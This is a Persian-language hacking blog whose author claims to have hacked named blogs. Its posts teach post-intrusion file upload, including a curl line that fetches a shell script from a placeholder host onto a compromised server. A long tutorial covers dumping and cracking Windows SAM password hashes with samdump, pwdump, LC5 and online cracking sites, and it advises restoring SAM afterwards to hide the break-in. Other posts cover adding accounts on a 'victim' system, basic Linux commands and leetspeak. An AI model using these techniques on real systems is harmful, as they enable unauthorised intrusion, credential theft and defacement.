یافتن پسورد و یوزر نیم به وسیله مرورگر
جمعه 4 شهریور 1390 ساعت 03:25 ب.ظ | نوشته ‌شده به دست Mr.pouria ..... | ( نظرات )

شاید برای شما نیز پیش آمده است که Username یا Password خود در سایت‌های مختلف را فراموش کرده‌اید اما به لطف ذخیره بودن آنها در حافظه مرورگر، توانسته‌اید وارد سایت مورد نظر شوید. اما آیا راهی هست تا بتوان نام‌های کاربری و پسوردهای ذخیره شده در مرورگر را مشاهده کرده و آنها را در صورت لزوم حذف کرد؟ در این ترفند قصد داریم به معرفی نحوه انجام این کار در چهار مرورگر فایرفاکس، اپرا، گوگل کروم و اینترنت اکسپلورر بپردازیم.



ادامه مطلب


xyTune


eMech


funmihan1 وسط mr.pouria هك شد
سه شنبه 18 آبان 1389 ساعت 03:31 ب.ظ | نوشته ‌شده به دست Mr.pouria ..... | ( نظرات )
آدرس وب:www.funmihan1.mihanblog.com




مرتبط با: هك ,


xyTune


eMech


spamtest توسط Mr.Pouria هك شد
سه شنبه 4 آبان 1389 ساعت 06:34 ب.ظ | نوشته ‌شده به دست Mr.pouria ..... | ( نظرات )


وبلاگ اصلی:www.spamtest.mihanblog.com
  


مرتبط با: هك ,


xyTune


eMech


لیستی از دستورات برای آپلود كردن فایل بر روی سرور
دوشنبه 22 شهریور 1389 ساعت 02:52 ب.ظ | نوشته ‌شده به دست Mr.pouria ..... | ( نظرات )
یك لیست كامل قراره قرار بدم اینجا كه اگه به یك سرور دسترسی داشتید چجوری روش فایل اپلود كنید


اول ویندوز

یك دستور نسبتا كلی


کد:
Tftp -i ip Address Get/Put Source Destination
بقیه در ادامه مطلب.....

ادامه مطلب
مرتبط با: هك ,


xyTune


eMech


قسمت دوم(اپلود در لینوكس)
دوشنبه 22 شهریور 1389 ساعت 02:44 ب.ظ | نوشته ‌شده به دست Mr.pouria ..... | ( نظرات )
برای سرور ویندوز توضیح دادم بریم سر لینوكس

چالش:از یك سرور لینوكس دسترسی داریم ولی.....

حالا میخوایم یك فایل اپلود كنیم


چند تا راه داره


شماره1-

کد:
curl -o dc.pl http://[shell]
بقیه در ادامه مطلب...

ادامه مطلب
مرتبط با: هك ,


xyTune


eMech


خط فرمان لینوكس قسمت دوم
چهارشنبه 10 شهریور 1389 ساعت 10:27 ب.ظ | نوشته ‌شده به دست Mr.pouria ..... | ( نظرات )
 برای دیدن محتویات یك دایركتوری(پوشه) از فرمان ls كمك میگیریم مشابه dir در ویندوز
كه اگر تایپ كنیم ls -a محتویات همراه فایلهای مخفی نمایش داده میشن كه این فرمان علاوه بر سوییچ a- سوییچهای دیگری مثل l- داره كه یه سری اطلاعات میده پس برای كسب اطلاعات بیشتر تایپ كنید man ls
-----------------------------

---------------------------
اما گاهی اوقات پیش میاد كه از یه دایركتوری ls میگیریم و محتویات اون در یك صفحه جا نمیشه راه حل اینه كه از دستور ls به اینصورت استفاده كنم ls -a |more
---------------------------------------

-----------------------------------------
كه این دستور مشابه dir /p در ویندوزه
------------------------------------------------

---------------------------------------------------

اما برای رفتن به مسیر و دایركتوری دیگه از دستور cd استفاده میكنم
مسیر فعلی من در Home هست كه حالا میخام بهsbin واقع در usr برم usr/sbin
پس میتونم بنویسم cd /usr
cd /sbin
-------------------------

------------------------------
یا اینكه كل مسیر رو یه جا بنویسم
و اما در هر مسیری كه باشم واسه برگشت به home كافیه تایپ كنم cd
یه نكته(راستی بعد از نوشتن دستورات اینتر فراموش نشه<<شوخی كردم!!!!<<<
برای اینكه بدونیم الان در چه مسیری هستیم كافیه بنویسم pwd
--------------------------------------------------------

--------------------------------------

فایلها و پوشه ها
برای كپی كردن یك فایل از فرمان cp استفاده میكنم به شكل cp filename Destin
--------------------------------

--------------------------------------
دقت كنید كه من واسه اینكه بتونم فایل zic رو كپی كنم با فرمان su root به كاربر ریشه سوییچ كردم اونوقت فرمان كپی صادر كردم

برای جابه جایی یك فایل از دستور mv به این شكل استفاده میكنم mv filename/newmasir

برای حذف یك فایل از فرمان rm كمك میگیریم به صورت : rm filename
-------------------------

------------------------------
در مثال بالا همونجور كه میبینید من نتونستم clock حذف كنم چون اجازه نداشتم پس مجبور شدم به یوزر ریشه لوگین كنم و بعد اونو حذف كنم
اما یه نكته مهم اینكه علامت اعلان در root شارپ هست# و در یوزرای دیگه $

پوشه ها
اما برای ساخت یه پوشه از دستور از دستور mkdir (مخفف make directory) كمك میگیریم
پس مینویسم mkdir br4v3 كه با این دستور در مسیر جاری یه پوشه ساخته میشه به اسم br4v3
باور ندارید یه dir بگیرید)

برای حذف دایركتوری كه ساختم از فرمان rmdir استفاده میكنم پس مینویسم rmdir br4v3

نكته:برای دیدن لیستی از دستورات كه تو terminal جاری استفاده شده مینویسم history
كه history فرمان بسیار جالبی هستش

ایجاد یك فایل و دیدن اون
برای ایجاد یك فایل راهای زیادی هست(فرمان touch,...)
من در اینجا میخام یه فایل متنی با ویرایشگر قدرتمند Vi ایجاد كنم
1-در خط فرمان مینویسم vi و سپس اینتر حالا وارد ویرایشگر vi شدیم
2-برای اینكه وارد Insert Mode بشم تا بتونم متنی رو تایپ كنم باید بنویسم i
3-وقتی كه متن رو نوشتم برای سیو باید كلید Escape رو بزنم
4-سپس بنویسم w max:
--------------------------------

------------------------------------
كه با این دستور فایل متنی به اسم max در مسیر جاری ایجاد میشه
5-برای خروج هم باید بنویسم exit:

دیدن فایل
برای دیدن یك فایل از دستور more filename استفاده میكنم
ابتدا یه ls میگیرم و میبینم كه فایل متنی max ایجاد شده
حالا میخام محتویات اونرو ببینم
پس مینویسم more max
--------------------------------
این دستور More جهت دیدن محتویات مثل type تو ویندوزه

مرتبط با: هك , آموزشی ,


xyTune


eMech


خط فرمان در لینوكس قسمت اول
چهارشنبه 10 شهریور 1389 ساعت 10:25 ب.ظ | نوشته ‌شده به دست Mr.pouria ..... | ( نظرات )

  - شل وكرنل چیست؟ با سلام
امیدوارم همونجوری كه تو پست اول توضیح دادم با لینوكس كار كرده وآشنا شده باشید و فرض هم بر این است
اگر مبتدی هستید انجمن لینوكس فراموش نشه ولی بازم از صفر آغاز میكنم!!!!
اما خط فرمان لینوكس شبیه Command Prompt ویندوز هست ولی چیزی فراتر از آن
این خط فرمان بسیار قوی و انعطاف پذیر و برای نفوذ از اولویت های یادگیری است
كلیه مثالها رو من با خط فرمان و سیستم عامل لینوكس Redhat Fedora Core 4 انجام دادم تحت محیط Gnume
این رو گفتم كه اگه محیط شما فرق داشت مشكلی پیش نیاد!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
--------------------------------------------

----------------------------------------------
یك نكته خط فرمان لینوكس نسبت به بزرگی و كوچكی حروف حساس میباشد
من كلیه دستورات رو نمیگم پس در اولین بار اجرا بنویسید Help
---------------------------------------------
كرنل چیست ؟كرنل یا هسته سیستم عامل مدیریت تمامی سیستم رو بر عهده داره
مختصری در مورد شل:شل برنامه ای است در لینوكس كه واسطه خط فرمان میشه بین كاربر و كرنل(هسته) سیستم عامل
پس ما برای ارتباط با كرنل از شل استفاده میكنیم
مطلب جامع در مورد شل بعدا
فقط اینو بگم برای اینكه بدونیم از كدوم شل داریم استفاده میكنیم مینویسیم echo @SHELL
-------------------------------------


---------------------------------------
پس مسیر به من میده كه هست /bin/bash كه باید بگم bash شل پیشفرضه لینوكسه

اما برای دسترسی به خط فرمان میتونیم:
1-در پانل اصلی روی آیكون ردهت كلیك كرده و سپس System Tools>Terminal

2-در Run مینویسیم xterm

3-در صفحه لوگین ابتدایی از منوی Session گزینه Failsafe رو انتخاب میكنیم كه با این كار سیستم عامل از خط فرمان بوت میشه

4-گاهی اوقات است كه سیستم عامل لینوكس ما اصلا خط فرمانی است

حالا به یكی از روشهای بالا پنجره ترمینال رو باز كردم میبینم كه:
-----------------------------------------------------

-----------------------------------------------------------
پس میبینیم نام كاربری كه با اون لوگین شدیم br4v3 هستش

اما برای بررسی نشستی كه هم اكنون در حال اجراست مینوسیم id و میبینیم كه:
و همچنین فرمان who
----------------------

--------------------------------
كه تو عكس به خوبی مشخص شده كه
مورد اول User id میشه شماره كاربر
مورد دوم میشه گروه كاربری
مورد سوم میشه گروهی كه كاربر به اون دسترسی داره

خط فرمان عظیم لینوكس دارای قدرتی بینظیره
پس برای هر دستوری كه نمیدونیم چه كار میكنه از دستور man كمك میگیرم (مخفف Manual)
یه مثال: میخام اطلاعاتی در مورد دستوز Shutdown و نحوه استفاده از اون كسب كنم پس مینویسم man shutdown
----------------------------------

-----------------------------------------

یك نكته مهم:بعضی از عملیاتها به كاربر ریشه(ادمین) یا همون root نیاز دارن مثل نصب یك package یا حذف یه فایل یا فرآیند خاص ....
در خط فرمان برای اینكه از كاربر فعلی به root سوییچ كنیم از فرمان su همراه نام كاربر كمك میگیریم
پس مینویسم su root
كه باید رمز عبور اصلی رو بدم(موقع تایپ كردن چیزی نمیبینیم)

مرتبط با: هك , آموزشی ,


xyTune


eMech


System Accounts Manager
چهارشنبه 10 شهریور 1389 ساعت 10:24 ب.ظ | نوشته ‌شده به دست Mr.pouria ..... | ( نظرات )
پایگاه Sam بحث ما در مورد پایگاه SAM هست مخفف System Accounts Manager
و همچنین روشهای بدست آوردن پسورد در حالت Local و Remote
قبلا هم مطالبی در مورد اون گفتم
اما
پایگاه SAM: پایگاهی است در ویندوز كه اكانتها و پسوردهاشون در اون ذخیره میشه(بصورت رمز شده) اما در غیر از ویندوز
مثل لینوكس از PWL استفاده میشه
فایل SAM محافظت میشه یعنی نمیتونید حذف و یا كپیش كنید مگر از داس یا با فلاپی بوت داس كه اینا گفته شده

فایل SAM در مسیر %systemroot% یعنی جایی كه ویندوز نصب شده میتونید ببینید پس اگر ویندوز من در درایور K باشه میشه K:\Windows\System32\Config
اما یه نسخه Backup از SAM تو %Repair% ممكنه موجود باشه كه اینو میشه معمولی كپی كرد
SAM دستی هم تو رجیستر داره كه این اطلاعات واسه یه هكر در Remote میتونه واقعا مفید باشه

الگوریتم ویندوز برای Hash(رمز كردن) پسورد:
1-Lanman hash یا همان LM Hash
این نوع hash كردن در سری NT قبل از ورژن 4 مانند ویندوزهای 98-me-95 استفاده شده این روش بوسیله شركت كامپیوتری IBM ابداع و توسط مایكروسافت
استفاده شد!!!!

2-NTLM hash كه از الگوریتم LM پیشرفته تر است در NTLM از Message Digest-4 یا به اصطلاح الگوریتم MD-4 همانند یونیكس استفاده شده

مراحل رمز شدن پسورد و مقایسه دو الگوریتم LM ,NTLM
در LM طول رمز 14 حرف است .مثال:قراره پسوردی مانند majeedsho ذخیره بشه چون طول این رمز از 14 حرف كمتره به آخر اون بطور تصادفی
مثلا اونقدر 7 اضافه میشه تا بشه 14 حرف:majeedsho77777
بعد حروف كوچیك بزرگ میشه :MAJEEDSHO77777
حالا این 14 حرف بو دو قسمت 7 حرفی تقسیم میشه پس داریم:MAJEEDS , HO77777
حالا هر قسمت 7 حرفی با یه الگوریتم غیر برگشت رمز میشه وكنار هم قرار داده میشه تا یك رشته 32 حرفی بدست بیاد
پس پسورد من كه در ابتدا majeedsho بود بعد از این مراحل میشه:AF6E956C6F6836C44F35E8F519B35C89
این اولین الگوریتم ویندوز برای hash است یعنی همون LM hash
اما عیب LM اینه كه حداكثر طول رمز 14 حرفه و بر خلاف یونیكس Salted نیست اینو پایین میگم

و در NTLM كه نتیجش یه رشته 32 حرفی است اما بر خلاف LM طول رمز مبنی بر 14 حرف نیست بلكه بیشترم میتونه باشه
پس این اولین برتری NTLM اما مایكروسافت هنوز LM استفاده میكنه چرا:این به عهده خودتون
اما هنوز در NTLM مشكل Salted حل نشده

سوال:Salted
Salted(نمك) یه الگوریتم در هم سازی رمزه در ماشینهای مختلف متفاوته(مثل دو سیستم در نت كه ip اونها در اینترنت متفاوته)

پس salted عمل پیدا كردن الگوریتم استفاده شده در رمز رو سخت میكنه
Salted در لینوكس وجود داره اما از اونجا كه در ویندوزهای NT وجود نداره كرك پسورد بسیار سریع پیش میره


Systemkey
جدیده از سری NT 4 به بعد
systemkey كارش اینه كه پسورهای ذخیره شده در SAM رو یكبار دیگه رمز میكنه تا نفوذ به اون سختتر بشه
---------------------------------------------------------------------------------------------------------------------------
اما SAM رو چجوری گیر بیاریم
با استفاده از یه فلاپی Dos و با روشهایی كه گفته شده به علاوه برای بعضی از PASS Cracker ها فایلی به اسم
system رو هم لازم داریم كه در همون جایی كه SAM هست وجود داره
حالا فرض كنید ماSAM رو داریم و اون رو تو یه مسیر فرضی مانند:C:\NF\SAM سیو كردیم
اگر در بدست آوردن اون مشكل داشتید بگید حتما
یه نكته در ویندوز 2000 اگر ُSam رو حذف كنیم میشه لوگین شد بدون پسورد(اما واسه این كه ضایع نشیم بهتره اونو كپی كنیم یه جا كه بعد از اتمام كارمون دوباره restore كنیم اونو)
در ویندوز 98 هم میشه با حذف فایلهایی با پسوند PWL از رمز عبور رد شد(كه دیگه 98 فكر نكنم رو client یا Server پیدا بشه البته شایدم باشه!!!)
--------------------------------------------------------
نفوذ به SAM و كرك كردن پسورد
(منظور از خط فرمان اینه كه باید تو RUN... بنویسی cmd تا به خط فرمان بری میدونم واردید اینو واسه...)

1-استفاده از samdump كه یه ابزار خط فرمانی هست (برای دیدن محتویات SAM)


حال تو خط فرمان مینویسم samdump c:\nf\sam
قسمت دوم یعنی c:\nf\sam مسیر sam هست كه بدست آوردیم
برای Save كردن اطلاعات SAM هم میتونیم بنویسم:samdump c:\nf\sam > majeed76.txt


2-Dump كردن از رجیستری
استفاده از pwdump (البته در حالت دسترسی ادمین)
برای بكار بردن باید تو خط فرمان بنویسم pwdump
اگر خاستین اطلاعاتی كه میده رو سیو كنین مینویسین:pwdump >c:\majeed76.txt
من در اینجا از Pwdump2 استفاده كردم


اون عددی كه بعد از نام كاربر اومده شماره اون هست مثلا 500 برای Admin
-------------------------------------------------------------------------------------------------------
حالا كه هم فایل SAM وSystem رو دارم وهمچنین محتوای SAM رو هم كه با SAMDUMP و PWDUMP استخراج كردم
باید این كلمات رو در هم برهم رو بصورت قابل استفاده در بیاریم

1-استفاده از PASS CRACKER ها
با استفاده از دو فایل SAM و system كه به این برنامه میدیم میتونن برامون رمز رو پیدا كنن
اما روش كارشون هم اینه كه از حلقه تكرار استفاده میكنن كه این زمان رمز گشایی رو افزایش میده
یه نمونش Proactive Password Auditor دوستان گذاشتن
و محبوب من LOPHT Crack كه تاجایی كه میدونم آخرین نسخش 5 هستش






كار باهاشون هم راحته ,و همچنین همین Lopht Crack یا به اختصار LC5 گزینه های زیادی برای local و ریموت داره


2-خوب از sam و system استفاده كردیم میمونه فقط فایل majeed76.txt رو كه بالا بدست آوردیم
و در ضمن همین فایل رو هم میتونیم مثلا با LC5 باز و رمز گشایی كنیم
استفاده از ابزارهای خط فرمانی مثل:John The Ripper
استفاده از این به عهده خودتون به عنوان تمرین

3-استفاده از سایت ها
سایتهایی مثل
کد:

کد:
WWW.plain-text.info

این سایتها با بانكهای قوی كه دارن كرك SAM رو سریعتر میكنن
اما من استفاده رو برای همین سایت میگم
میریم تو سایت از سمت چپ Add Hashes رو میزنیم بعد majeed76.txt رو كه تو بالا بدست آوردیم
كپی میكنیم و منتظر میشم


کد:
WWW.loginrecovery.com
میریم به سایت واز STEP 1 فایلمون رو حالا یا روی فلاپی یا CD دان میكنیم بعد حالا سیستم رو با اون فلاپی بوت میكنیم(فایل مورد نیاز رو برای فلاپی در زیر گفتم )
وقتی سیستم رو با فلاپی یا سی دی بوت كنیم (اگه نشد از روشهای بالا كمك بگیرید)بعد این فلاپی خودكار sam رو بدست میاره و به اسم UPLOAD.txt داخل فلاپی
سیو میكنه حالا ما این فایل رو كه مثل همونی میمونه كه خودمون بالا با SAMDUMp ساختیم به STEP 3 میبرم (تو سایت)
توضیح:فایلی كه این فلاپی میسازه منظورم همون Upload.txt رو میشه با كمی تغییر واسه Pass Cracker ها قابل استفاده كرد
5-استفاده از لایو سی دی هایی كه موجوده (من خودم به شخصه استفاده نكردم و خوشم هم نمیاد!!!)
اینام مثلا خودكار اگه سیستم رو با سی دی بوت كنیم رمزهارو مثلا پاك میكنه

برای Remote هم كه ابزار زیاد هست مثل Cain Abel و Brutus.....(در مورد remote بحث مفصلی بعدن)




در مورد رمز عبور linux هم به موقع و به جای خودش
اما راهكار اینه كه از رمزهای نامعقول استفاده كنیم مثلا رمز #maj45 از رمز 123456 واضحه كه امنیش خیلی بالاتره

دانلود (اگر مشكل داشتید رایت كلیك كنید و
(در ضمن طبیعی هست كه آنتی ها این ابزار رو ویروس تشخیص بدن پس نگران نباشید!!!!!!)
samdump and Pwdump and JohnTheRipper

کد:
Download
دانلود فایل فلاپی LoginRecovery
بعد از اكستركت فایل رو اجرا كنید بصورت اتوماتیك خودش فایلهارو تو فلاپی كپی میكنه و بعد سیستم رو با اون بوت كنید
کد:
Download
بقیه موارد رو هم میتونید با سرچ دان بزنید

مرتبط با: هك , آموزشی ,


xyTune


eMech


معادلهای متداول در هك
چهارشنبه 10 شهریور 1389 ساعت 10:22 ب.ظ | نوشته ‌شده به دست Mr.pouria ..... | ( نظرات )
معادلهای متداول در هك در علم هك به جای بعضی حرفها معادل اونها به كار میره كه عبارتند از كه بعضی حروف چند معادل دارند
A=4
B=8
C=(
D=|)
E=3
F=PH
G=6
H=][, }{ ,)(
I=1,|
J='|
K=|<
L=1
M=/\/\
N=/\/
O=0
P=|),|>
Q=0,
S=$,5
T=7
V=\/
W=\/\/
Z=2,S
-----------
0=O
1=L,I
2=Z
4=A
5=S
6=G
7=T
8=B

برای مثال hi میشه:
1}{

brave
میشه:
8r4v3

مرتبط با: هك ,

برچسب‌ها: معادلهای متداول در هك , هك , آموزش هك , a , s , d , f , g , h , j , k , l , m , n , b , v , c , x , z , q , w , e , r , t , y , u , i , o , p , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 0 ,

xyTune


eMech


ایجاد وحذف اكانت از طریق كامند
چهارشنبه 10 شهریور 1389 ساعت 10:10 ب.ظ | نوشته ‌شده به دست Mr.pouria ..... | ( نظرات )
ایجاد اكانت از طریق كامند من هم یه مبحث دیگه رو باز می كنم در مورد اكانتها.
ایجاد اكانت ،حذف اكانت،قرار دادن پسوورد برای اكانت و...

ما با استفاده از دستورnetمی تونیم این كارو انجام بدیم .خوب همین دیگه تایپ كنید در كامند:
C:\Documents and Settings\newmusic\net
بعد از تایپ فرمانهای زیر نمایان میشه

NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]

خوب دستورات زیادی هست هر كدو كار خاصی انجام می ده ما بحثمون در مورد فرمان net user هست
تایپ می كنیم net user شكل كلی در زیر:

C:\Documents and Settings\newmusic>net user

خوب مرحله خیلی قشنگیه راستی به نظر من در كامند 2 قسمت از همه باحالتره یكی همین فرمان net user ویكی دیگه فرمان reg كه من عاشقشم وقتی از یكی شل داری با این 2 فرمان می تونی.حسابی حال كنی.

برگردیم سر آموزش:

بعد از تایپ فرمان net user اطلاعات زیر نمایان میشه:


User accounts for \\xp

---------------------------------------------------------
newmusic Administrator Guest
HelpAssistant SUPPORT_385445a0
The command completed successfully.

خوب الان كار اصلی شروع شد ما می خوایم به طور مثال یك یوزر به نام subproxy رو روی سیستم قزبانی ایجاد كنیم.اا ببخشید روی سیستم خودمون.هواسم نیستشاا.
دستور زیر رو تایپ می كنیم:
C:\Documents and Settings\ newmusic >net user subproxy /add
خوب حالا پیغام میده
The command completed successfully.

یعنی عملیات موفقیت آمیز بود به طور كامل
خوب حالا شما دستور زیر رو تایپ كن و میبینی یوزر ایجاد شد.
C:\Documents and Settings\admin>net user
و جواب میده.


-----------------------------------------------------------
newmusic Administrator Guest
HelpAssistant subproxy
SUPPORT_385345a0

خوب ما حالا می خوایم علاوه بر اینكه یوزر رو ثبت می كنیم یه پسوورد هم تعریف كنیم.
در این حالت شما دستور زیر رو به طور كامل تایپ كنید:
C:\Documents and Settings\ newmusic>net user 3434 subproxy /add

خوب در دستور بالا با یك پسوورد تعریف كردیم كه هست 3434 و برقیش هم مثل روال قبلی بود.
اینم آموزش ایجاد اكانت به طور واضح و كامل .حالا میرسیم به قسمت حذف اكانت كه با استفاده از دستور
Del این كار هم انجام میشه.فرمان زیر را به طور كامل تایپ می كنیم.
البته بگم الان می خوایم اكانت subproxy رو پاك كنیم.البته باز هم در پاك كردن اكانت نیازی به پسوورد نیست یعنی ما می تونی اكانت هر كسی رو پاك كنی.كه بازم این عمل یه شرایط خاصی رو می طلبه

خوب این دستورهم كه الان میگم برای پاك كردن اكانت شد.
C:\Documents and Settings\ newmusic>net user subproxy \del

مرتبط با: هك , ترفند هك , آموزشی ,


xyTune


eMech




 
موضوعات
نویسندگان
دیگر موارد
تعداد مطالب :
تعداد نویسندگان :
آخرین بروز رسانی :
بازدید امروز :
بازدید دیروز :
بازدید این ماه :
بازدید ماه قبل :
بازدید کل :
آخرین بازدید :

شبکه اجتماعی فارسی کلوب | Buy Website Traffic | Buy Targeted Website Traffic